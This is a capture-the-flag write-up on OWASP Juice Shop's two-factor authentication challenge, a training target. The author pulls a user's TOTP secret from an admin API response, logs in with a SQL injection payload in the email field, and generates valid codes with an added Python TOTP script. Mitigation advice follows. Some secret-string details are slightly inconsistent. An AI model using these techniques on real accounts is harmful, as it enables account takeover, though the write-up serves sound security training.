Hacking OWASP’s Juice Shop Pt. 58: Two Factor Authentication

Challenge: 

Name: Two Factor Authentication

Description: Solve the 2FA challenge for user “wurstbrot”. (Disabling, bypassing or overwriting his 2FA settings does not count as a solution)

Difficulty: 5 star

Category: Broken Authentication

Expanded Description: https://pwning.owasp-juice.shop/part2/broken-authentication.html

Tools used:

Google Authenticator Android app

Resources used:

No outside resources, but things learned in plenty of previous challenges.

Methodology: 

To start this challenge out, I decided to follow the suggestion in the expanded description to learn how the 2FA mechanism works normally. I began by signing Amy up for 2FA using my phone’s Google Authenticator application. By copying the QR code and entering the six-digit time-bound code supplied by the Authenticator application into the 2FA Configuration form, I successfully linked my phone to her account. 

[Screenshot: the 2FA Configuration form. Text: "Secure your account with an additional factor. Scan the QR code into an authenticator app supporting TOTP (e.g. Google Authenticator) to get started." Fields: Current Password, Initial Token; Save button.]

I then logged out and back in as Amy to be certain that the activation had worked. Immediately after the email/password form, this 2FA form popped up, and I was able to log in using the time-bound code supplied by my Authenticator application.

[Screenshot: the 2FA login form. Text: "Enter the 6 digit token from your 2FA app". Field: 2FA Token.]

After doing that, I logged in under the Admin account and visited the Admin section, then used the Network tab of Firefox's Developer Tools to check whether any data fields for Amy's account had been updated when I activated 2FA.

[Screenshot: entry 10 of the user list returned to the Admin section, as shown in the Network tab]

10: Object { id: 11, email: "amy@juice-sh.op", ... }
    id: 11
    username: ""
    email: "amy@juice-sh.op"
    password: (hash not shown)
    role: "customer"
    deluxeToken: ""
    lastLoginIp: "undefined"
    profileImage: "assets/public/images/uploads/default.svg"
    totpSecret: "E5602ROHNM6RGFJW"
    isActive: true
    createdAt: (not shown)
    updatedAt: (not shown)
    deletedAt: null

Sure enough, the "totpSecret" field now held a string of upper-case letters and digits where it had been empty before (I double checked the database contents I'd pulled during the User Credential and Database Schema challenges to confirm that). That string is the base32-encoded TOTP key, the same value the QR code hands to the authenticator app.

Knowing that this field was important to the challenge, and that the expanded description included a bullet point which explained that understanding time-based one-time passwords (TOTP) would be important, I checked the user data for Wurstbrot’s account.

[Screenshot: entry 9 of the same user list]

9: Object { id: 10, username: "wurstbrot", email: "wurstbrot@juice-sh.op", ... }
    id: 10
    username: "wurstbrot"
    email: "wurstbrot@juice-sh.op"
    password: (hash not shown)
    role: "admin"
    deluxeToken: ""
    lastLoginIp: "0.0.0.0"
    profileImage: "assets/public/images/uploads/default.svg"
    totpSecret: "IFTXE3SPOEYVURT2MRYGI52TKJ4HC3KH"
    isActive: true
    createdAt: (not shown)
    updatedAt: (not shown)
    deletedAt: null

The totpSecret field was populated with a longer secret than Amy's account had (32 base32 characters, i.e. a 160-bit key, versus Amy's 16 characters, or 80 bits), but that was no bother, since I knew that manually entering the TOTP secret into the Authenticator application would effectively skip the QR code step. I typed the secret into my phone and logged in as Wurstbrot using the same SQL injection trick I'd used in the Login Bender challenge.

[Screenshot: the Login form. Email: wurstbrot@juice-sh.op'-- ; Password: (any value); Log in.]

As I'd already linked my phone to this account, I simply entered the Authenticator code and passed Wurstbrot's 2FA check with a valid token. Note that this is not a bypass in the sense the challenge rules out: the server verified a correct TOTP, generated from the same secret it holds.

[Screenshot: the 2FA Token form with the Authenticator code 338168 entered and submitted, followed by the notification "You successfully solved a challenge: Two Factor Authentication (Solve the 2FA challenge for user "wurstbrot". (Disabling, bypassing or overwriting his 2FA settings does not count as a solution))".]
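To make concrete why a leaked totpSecret is as good as the user's phone, here is an added example (not code from this write-up or from Juice Shop): a minimal RFC 6238 TOTP implementation in Python using the defaults Google Authenticator assumes (HMAC-SHA1, 30-second step, 6 digits). verify_totp is what a server-side check looks like, with a one-step window for clock drift and a constant-time comparison. RFC6238_TEST_SECRET is the published RFC 6238 test key, so the result can be checked against the RFC's vectors. The demo at the bottom uses wurstbrot's secret as it appears in the Network tab above, with the OCR'd "1" read as the base32 letter I, because the base32 alphabet contains only A-Z and 2-7; that reading is an assumption about the screenshot, not a value the page states.

```python
import base64
import hashlib
import hmac
import struct
import time
from typing import Optional

# Secret from RFC 6238 Appendix B (ASCII "12345678901234567890", base32-encoded).
RFC6238_TEST_SECRET = "GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ"

# Constructed demo value: wurstbrot's totpSecret from the screenshot, with the
# OCR'd "1" assumed to be the base32 letter I (base32 has no digit 1).
WURSTBROT_SECRET = "IFTXE3SPOEYVURT2MRYGI52TKJ4HC3KH"


def decode_base32_secret(secret: str) -> bytes:
    """Authenticator apps accept the secret as unpadded, case-insensitive base32,
    optionally grouped with spaces; normalise and re-pad before decoding."""
    s = secret.strip().replace(" ", "").upper()
    s += "=" * (-len(s) % 8)
    return base64.b32decode(s)


def hotp(key: bytes, counter: int, digits: int = 6) -> str:
    """RFC 4226 HOTP: HMAC-SHA1 over the 8-byte big-endian counter, then
    dynamic truncation to a 31-bit integer, reduced modulo 10**digits."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: str, at: Optional[int] = None, period: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP: HOTP with counter = floor(unix_time / period).
    This is exactly what the phone computes once the secret is typed in."""
    if at is None:
        at = int(time.time())
    return hotp(decode_base32_secret(secret), at // period, digits)


def verify_totp(secret: str, token: str, at: Optional[int] = None,
                window: int = 1, period: int = 30) -> bool:
    """Server-side check: accept the current step and +/- `window` neighbouring
    steps to tolerate clock drift, comparing each candidate in constant time."""
    if at is None:
        at = int(time.time())
    key = decode_base32_secret(secret)
    base = at // period
    for step in range(base - window, base + window + 1):
        if hmac.compare_digest(hotp(key, step), token):
            return True
    return False


if __name__ == "__main__":
    now = int(time.time())
    # Same arithmetic the authenticator app does; the only input is the stored secret.
    print(f"wurstbrot's token right now: {totp(WURSTBROT_SECRET, now)} "
          f"({period_left := 30 - now % 30}s left in this step)")
    print("server would accept it:", verify_totp(WURSTBROT_SECRET, totp(WURSTBROT_SECRET, now), now))
```

Running it against a live Juice Shop instance would print the same six digits the Authenticator app shows for wurstbrot in that 30-second step, which is the whole point: TOTP is a symmetric scheme, so possession of the secret is possession of the second factor.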

Prevention and Mitigation Strategies:

OWASP MFA Cheat Sheet

The root cause here is that the user-listing response seen in the Network tab included the totpSecret field at all. A TOTP secret is a shared symmetric key: anyone who reads it can produce the same codes as the user's phone, so it must never be serialized into any API response, whatever the caller's role. Also, encrypt TOTP keys before storing them in the database, with the encryption key kept outside that database (for example in a KMS or HSM), so that a leaked dump exposes only ciphertext; brute-forcing a properly encrypted 80- or 160-bit secret, even knowing which algorithm was used, would be borderline impossible within a lifetime. Encryption at rest does not fix this particular leak on its own, though: the application decrypts the secret to verify tokens, and an endpoint that echoes the decrypted record back to the client would still hand it over.

Lessons Learned and Things Worth Mentioning: 

This is the first time I’ve ever thought to myself “I’m becoming a hacker!”. Having drawn information and/or techniques from at least six previous challenges, along with a workable understanding of how multi-factor authentication via phone application works, and then essentially weaponizing all of that disparate knowledge to complete this challenge was pretty satisfying.
